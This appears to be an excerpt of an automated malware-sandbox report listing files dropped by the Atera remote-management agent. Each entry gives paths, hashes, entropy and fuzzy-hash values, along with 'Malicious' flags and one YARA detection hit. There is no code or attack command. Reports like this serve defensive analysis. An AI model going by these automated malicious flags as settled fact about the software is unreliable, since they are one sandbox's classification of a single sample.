                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):704552
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.9539626583477325
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:79BzaPm657wqehcZBLX+HK+kPJUQEKx07N0TCBGiBCjC0PDgM5j9FKjc3S:78m657w6ZBLmkitKqBCjC0PDgM5i
                                                                                                                                                                                                                                                                                              MD5:50E3F5A0E04CBD99D4BE8CFE914C7BBE
                                                                                                                                                                                                                                                                                              SHA1:19D99AE964F490E055942D516C60DFDEDC585825
                                                                                                                                                                                                                                                                                              SHA-256:89ED8CBC24723D67AC7E47D0D018EA293F15FC210D9B3E26DC555F464E9B15CD
                                                                                                                                                                                                                                                                                              SHA-512:2F67DBB41631B6134414D1685815DAEA7F38120D88F83CB8F83763CF18B1F6AA2B9A5A7EAEF816EB8A24998536556128C15128B4E301B765C859A9741D69BA25
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.649241268222702
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:hsShKF4MsShLP6SX9NfzyShaKf0OVCGShaKf0Od:m4qBX9Nf1VCd
                                                                                                                                                                                                                                                                                              MD5:B7471135FE1C0CA5A1BAA1F2B47FFA1D
                                                                                                                                                                                                                                                                                              SHA1:963231DCA14C3598FB46B0674624A9F2F2B0376F
                                                                                                                                                                                                                                                                                              SHA-256:38B149725143E00E4EC4A21EBC96CB8CFB2A160F01CA7D4B25983F51413303B6
                                                                                                                                                                                                                                                                                              SHA-512:5F45B37CB165B57D9D39522BC90708AF98C162148EC02A0F4595D182C3AFCCD41760A8A2B170997A6EEB1E6F1A7BF31ACDF7B37FCBA845AC547E031999B33181
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................TAgentPackageAgentInformation, Version=38.8.0.0, Culture=neutral, PublicKeyToken=null.....6AgentPackageAgentInformation.Cache.CachedDynamicFields.....<DynamicFields>k__BackingField.<Timestamp>k__BackingField..JAgentPackageAgentInformation.Api.Information.CustomField.DynamicFieldDto[]...............\.I..H...............HAgentPackageAgentInformation.Api.Information.CustomField.DynamicFieldDto................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):35
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8645783739023822
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:GBjyXgBkHRcry:6jTBkHRcu
                                                                                                                                                                                                                                                                                              MD5:6262109EBA7667FE48248BCCAD76C409
                                                                                                                                                                                                                                                                                              SHA1:52265059C2B0CC3BA11CD831DDE6100E53B9AA13
                                                                                                                                                                                                                                                                                              SHA-256:46B7C6D1EC55444FB24801F4D836ADD340C57A591E5DE786F2A35E8DB1C7E26E
                                                                                                                                                                                                                                                                                              SHA-512:EF990E4C477F1490F4EA1B9149375C89909A0577B47EED1FCD69C91941030DA9BB499AB6984AB42C5F56FB3BB4ABAEF1CF59094E3513681A7EF063C750ECC601
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.626538F84035EC580EF82A256E496B41
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):35
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.677028119136097
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:fc3Gh7UgzVchXn:f7NUgWn
                                                                                                                                                                                                                                                                                              MD5:E49A5284D2F384905389D53944708C48
                                                                                                                                                                                                                                                                                              SHA1:E455420E95EA0246B8B63A251B0E451ACD711B28
                                                                                                                                                                                                                                                                                              SHA-256:33FD3B161AEC8867652C6B0707180ADC42C267EE9F66E33BF0CE70B55B4660B9
                                                                                                                                                                                                                                                                                              SHA-512:E9EC60296F38F68EB6C6233094E50EF534CE44A91E6511097158D631673017F8FE316E1C11A494C29BD8BE6F94AAFBF9F4A9546E709694BD3CC98B12CD243FF4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.2E69DDAE9D0D04A8ED39EECA359A9772
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):310624
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999405219212172
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:6144:EQjapzpRU64iYUQf9N4E/xWTUugwXWBoJW55fJKsff+Idm3lqd0LNIN5:EUaBXU5BjfcE5WTkwGRfQY+Om3lqdvL
                                                                                                                                                                                                                                                                                              MD5:CB8B58765B2386EC38F32F17C7BEFCE9
                                                                                                                                                                                                                                                                                              SHA1:6FF84B9B3884F75A3BAA40E64181AF326A1DB4C5
                                                                                                                                                                                                                                                                                              SHA-256:2FDE849766B928C180458B200E866140C73692245C6AF9080B63992C190E80EE
                                                                                                                                                                                                                                                                                              SHA-512:79D7A4344D1D3F3640D6847B785695F8766DB3A9D1558325B0365FD7FDD2C7AD546B2CFFC8115A4495E22B8B70DB1B845030AF54D26009628E0144F0D8925571
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27696
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.448893455648887
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:TndoS4jOhWCHDIJNQnt96+aTkdMEdcG7UhZPWU1Nyb8E9VF6IYinAM+oC8Z1KTm:Td0SkSeIUhrREpYinAMxCm
                                                                                                                                                                                                                                                                                              MD5:797C9554EC56FD72EBB3F6F6BEF67FB5
                                                                                                                                                                                                                                                                                              SHA1:40AF8F7E72222BA9EC2EA2DD1E42FF51DC2EB1BB
                                                                                                                                                                                                                                                                                              SHA-256:7138B6BEDA7A3F640871E232D93B4307065AB3CD9CFAC1BD7964A6BEC9E60F49
                                                                                                                                                                                                                                                                                              SHA-512:4F461A8A25DA59F47CED0C0DBF59318DDB30C21758037E22BBAA3B03D08FF769BFD1BFC7F43F0E020DF8AE4668355AB4B9E42950DCA25435C2DD3E9A341C4A08
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):542
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.041389931890446
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:MMHdGGsVZrdSJ9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdArdEtPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                              MD5:547C772B1DEA0A1E8030F6ED5BE2AF75
                                                                                                                                                                                                                                                                                              SHA1:6F4A95B2EA3342D7B4D61C715C7FC076EB6A2DC0
                                                                                                                                                                                                                                                                                              SHA-256:C35A8B8AF7ECCB9BA68B129FF7F46EB1279229D637049F40761A697E9DFCD5A4
                                                                                                                                                                                                                                                                                              SHA-512:0F77B35AC34C8E4655F7F1F4EBF1A86AA11F96C689E632DA8BE8A17CC69A9292878E0058DD9EA5FF7315DCDD8B34489F06E6DCBB365569E3BB80E81373792FC0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhUv:Wm
                                                                                                                                                                                                                                                                                              MD5:27AD88A291FC97D97FD773334DE4E487
                                                                                                                                                                                                                                                                                              SHA1:04B5DB46F05E02E2EC94B8A0A3447EA41FA4089D
                                                                                                                                                                                                                                                                                              SHA-256:4E7F8923223CB32E5D376EBC0C5361DD97DB201848590C4877D586723142B49F
                                                                                                                                                                                                                                                                                              SHA-512:5B21A87E19D4E3D7A14DC05C815B8D06500695360AAD1F54D2D3713CF05F646E9E7D559551BFE2CC2CDEBCE29A1991BC80AB2B11DDF79A4033897B34DCA40521
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=17.14
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):93232
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.196023578677744
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:5Svbne0Q41qJ3n8JMW+0KcBLQhZV5M+5Nn0komH7yAfRS7Hxh:5S8UMW+BV5M+5Nn0kom/RSz
                                                                                                                                                                                                                                                                                              MD5:BD539D820C8163E9E86E59B99ADEDD22
                                                                                                                                                                                                                                                                                              SHA1:FF367525BA06F8B9E611A82CFD57411BA4FBD1FE
                                                                                                                                                                                                                                                                                              SHA-256:04C547E06CA956DB2B929CC2B6B695A649FF0F82C52E56F2677A887E7D9616DE
                                                                                                                                                                                                                                                                                              SHA-512:FEBB46D70A5466C85087BD4E42FBA81682CF398739F7EFEF43982C830CCFD6FCEC4613F0B5542951A463161C891EE9F378CD4D2B15B1659DCBC0E15A34BA677F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):671744
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.893336561237734
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:fBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36Q:fBA/ZTvQD0XY0AJBSjRlXP36Q
                                                                                                                                                                                                                                                                                              MD5:C3689CE3217DD82D57880C31B89A9437
                                                                                                                                                                                                                                                                                              SHA1:051E913AAC2F4345D2364894C4154ABD287DB3FD
                                                                                                                                                                                                                                                                                              SHA-256:9367CB126577146DB3B9C26DD00DD71C7B228F30C0FA6C698FAC26CAEAB14D43
                                                                                                                                                                                                                                                                                              SHA-512:3471C18A4D79ED7C5FD268B25904EA2D6F3A15551B6517BD23ACD8ADE84FFF301492EC6C8861624E6F2699CDF9046DA2A8BAF351FB88EFC3AD4673A42AE57F7B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):833993
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999644881255343
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:24576:peRqTiLR3omp/AAzr5nxL2CP+sZ4tgMfQo:p8nLR4WYA72CPPoKo
                                                                                                                                                                                                                                                                                              MD5:9B1F97A41BFB95F148868B49460D9D04
                                                                                                                                                                                                                                                                                              SHA1:768031D5E877E347A249DFDEAB7C725DF941324B
                                                                                                                                                                                                                                                                                              SHA-256:09491858D849212847E4718D6CC8F2B1BC3CAA671CEB165CF522290B960262E4
                                                                                                                                                                                                                                                                                              SHA-512:9C8929A78CB459F519ACE48DB494D710EFD588A19A7DBEA84F46D02563CC9615DB8AA78A020F08ECA6FA2B99473D15C8192A513B4DF8073AEF595040D8962AE4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):219696
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.943430076853408
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:It3Mf3ZwYUPEpbPwygJQetg0+BpU3I0toxhGf:2MfJPpjYN8hI
                                                                                                                                                                                                                                                                                              MD5:01807774F043028EC29982A62FA75941
                                                                                                                                                                                                                                                                                              SHA1:AFC25CF6A7A90F908C0A77F2519744F75B3140D4
                                                                                                                                                                                                                                                                                              SHA-256:9D4727352BF6D1CCA9CBA16953EBD1BE360B9DF570FD7BA022172780179C251E
                                                                                                                                                                                                                                                                                              SHA-512:33BD2B21DB275DC8411DA6A1C78EFFA6F43B34AFD2F57959E2931AA966EDEA46C78D7B11729955879889CBE8B81A8E3FB9D3F7E4988E3B7F309CBD1037E0DC02
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):541
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.097123194334321
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:MMHdGp2VvOF9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsIOvPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                              MD5:D0EFB0A6D260DBE5D8C91D94B77D7ACD
                                                                                                                                                                                                                                                                                              SHA1:E33A8C642D2A4B3AF77E0C79671EAB5200A45613
                                                                                                                                                                                                                                                                                              SHA-256:7D38534766A52326A04972A47CACA9C05E95169725D59AB4A995F8A498678102
                                                                                                                                                                                                                                                                                              SHA-512:A3F1CFF570201B8944780CF475B58969332C6AF9BEA0A6231E59443B05FC96DF06A005FF05F78954DBE2FEC42DA207F6D26025AA558D0A30A36F0DF23A44A35C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhXWp:WBc
                                                                                                                                                                                                                                                                                              MD5:DFDD2EB77BBB74518BAD98519A857D41
                                                                                                                                                                                                                                                                                              SHA1:5F4F91D73EA620CDF0E5AC458E80B71412B1BB9F
                                                                                                                                                                                                                                                                                              SHA-256:7655078305CC5B4F62569EF9868E1B04FCC491D33FDAD1F8E4610C038BCBAC8D
                                                                                                                                                                                                                                                                                              SHA-512:481CDA97C03294EBAB036F99727828983C8D0E4C137AF05FDEA7FD296D11378904BACCE2D58D44F932A0BF7F2A30A9B44F4CBC05E253F132B1EF641F648C8DF0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=23.8
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):52272
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.300719339270839
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:5i8fXCGsSVh/2ixXxKFArYCJdshn9xvlOaEpYinAMxCuMr:5FaM2gS1y2F9Ob7HxCr
                                                                                                                                                                                                                                                                                              MD5:9467F653980C1C37E4C64811BA27C976
                                                                                                                                                                                                                                                                                              SHA1:68130FABBB50EAF5CFE2C355BA13B303DD373FB6
                                                                                                                                                                                                                                                                                              SHA-256:821847799A2B7B3A6EC20BA61388AC87707D9C6865BD904A44DE5B033BD2EF29
                                                                                                                                                                                                                                                                                              SHA-512:E72B7802256053589D889B2B7E74A2B53F328289A12CC0D4930D66410D00585C67B2C434512473CD2E74C8F2CB7685C2C34FCFC3DBA4A52399532CEB04153597
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):96816
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1801131806578455
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:hJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxwx:hQUm2H5KTfOLgxFJjE50vksVUfPvCI
                                                                                                                                                                                                                                                                                              MD5:F1B2303DD7E152BA70F3537EDB2E9638
                                                                                                                                                                                                                                                                                              SHA1:7E359D4B9011449DABB7F8236F14851A346B5028
                                                                                                                                                                                                                                                                                              SHA-256:8EE8B304339B6F87E79B117F605375AFFFCBABA290A1B41BB6B3C1A40E46767C
                                                                                                                                                                                                                                                                                              SHA-512:A4DD48F1AFF528DADF9974ADA1740CE785823FB584F55191D008158FCFB11F9ADAD8EFF992B8FF761058706C1717E28FBC9C337CF39D4EE4FFAA529501CB3188
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):19
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.1952959344962175
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MxXQvTFn:MRQn
                                                                                                                                                                                                                                                                                              MD5:66338403FD5EDB15023F5261AF4251F6
                                                                                                                                                                                                                                                                                              SHA1:E23827B2EEE6DC426E98C7C57B2F612CB6D73744
                                                                                                                                                                                                                                                                                              SHA-256:15DEA28F3C0A1D9DE97F6F358E979FAB0C6C329B52211AFA68B25CA58365C319
                                                                                                                                                                                                                                                                                              SHA-512:12E1DE4E4275012D0781D5F90131FCED4A3EFB299A956D71FB5AF7C2D8D3CF86DDE3F0592C4A76490EE4589545C623DC161F2A0B84DA1240C3C6786606110BD5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:06/01/2025 06:59:13
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):499760
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.056862695710082
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:HXv781Hpx+GfCdLr/jd9yyeEAHweiPofdyz7qd352SW8CdykAfqO:/76BfC5avfdyvc2SN
                                                                                                                                                                                                                                                                                              MD5:3CE7E73DB6F575A0D382DDAA8E1A3C10
                                                                                                                                                                                                                                                                                              SHA1:031C13652C540CA7F798D141D7C3333FB1C71618
                                                                                                                                                                                                                                                                                              SHA-256:692185C37DB7505250E58CC55D6707FCB099315A7FF319A9CC92FD99C5F0EEA7
                                                                                                                                                                                                                                                                                              SHA-512:5270E772613864BD223F31F89CFA500E56E7863967C58C503F92E193AF8C8CAF934B7755868EC21585A38E8D6D186A2DC5528A805A62A0BFA56B59E6506BFF81
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710192
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960733432365752
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:bBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUk:bBjk38WuBcAbwoA/BkjSHXP36RMGt
                                                                                                                                                                                                                                                                                              MD5:2A9525F27730CBF9E7145AADE4CDA830
                                                                                                                                                                                                                                                                                              SHA1:A6A99E02599656DE1C7F51B02C84BBA8AAE0346D
                                                                                                                                                                                                                                                                                              SHA-256:29D0073080509DB7F3F20C47980A1347CC4139C5F2E26C9C160AE67CE5EECB6E
                                                                                                                                                                                                                                                                                              SHA-512:DDDEEC7AA9D3F9E6187718564AE1A447FCAB12EC2DCBD26EDD87217B4815C274A6BAF90A027766FCC94815C762ED9BFA8D0DEF6C1B2F84279DED9C66852D381E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):277040
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.190626027944278
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:rSOIleacQlBh2YQMoIBhpq01TLvlj9b6gRZNsRYA:suQlBAMW0BvltxZ6B
                                                                                                                                                                                                                                                                                              MD5:4ECF017FD71CC84A4CBAB7507B8634BE
                                                                                                                                                                                                                                                                                              SHA1:2343F37490F9A11F5F0878A1553F0FAF504FE062
                                                                                                                                                                                                                                                                                              SHA-256:871D9403D045F94FC433907E49B68894764FCAF81E12FBDE2AC7A08642DDA32C
                                                                                                                                                                                                                                                                                              SHA-512:5FCB9BDA9C857BA1AD2EC0B19AD109AC54BAC91B8F8F00968560623C8AFD01FAEE1078F7C76010C7526A37C46EE0DB74A0E0DB151186F8FB220105F7091FA69B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):149552
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.059724018456156
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:o/S+nps5/3oat9QrwQmUgs0giOBDQntBBGBBKBUkBBXBBgBBFBUABU1BB0BBBBgB:o/S+nps5/3f9Qrdd5EtBBGBBKBUkBBXh
                                                                                                                                                                                                                                                                                              MD5:2FF31980FD256EF1B1E143D4699BB727
                                                                                                                                                                                                                                                                                              SHA1:608A21DA2B243E63DAD9E36EE84BC38C921F8E77
                                                                                                                                                                                                                                                                                              SHA-256:F34AD6FB7847A85ADBE1492C783233A8A32BB5E96972FA3738538CE20513F682
                                                                                                                                                                                                                                                                                              SHA-512:2FEF83A7668D190297863592FBBC8E766042067138C3A163771CDCF1FB284BC8162EA6B7B958CB076B6AB654216B855324AE292F78931C47EDC33B52376943AD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27184
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.334370226233819
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Bn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCw:BnvXYcIh6yFIFBYpc47Hxn
                                                                                                                                                                                                                                                                                              MD5:A964D6B5F323E343E884A1E4EBBA21A3
                                                                                                                                                                                                                                                                                              SHA1:41FEA32C2FCC56070CF904AB441019F963C83ED5
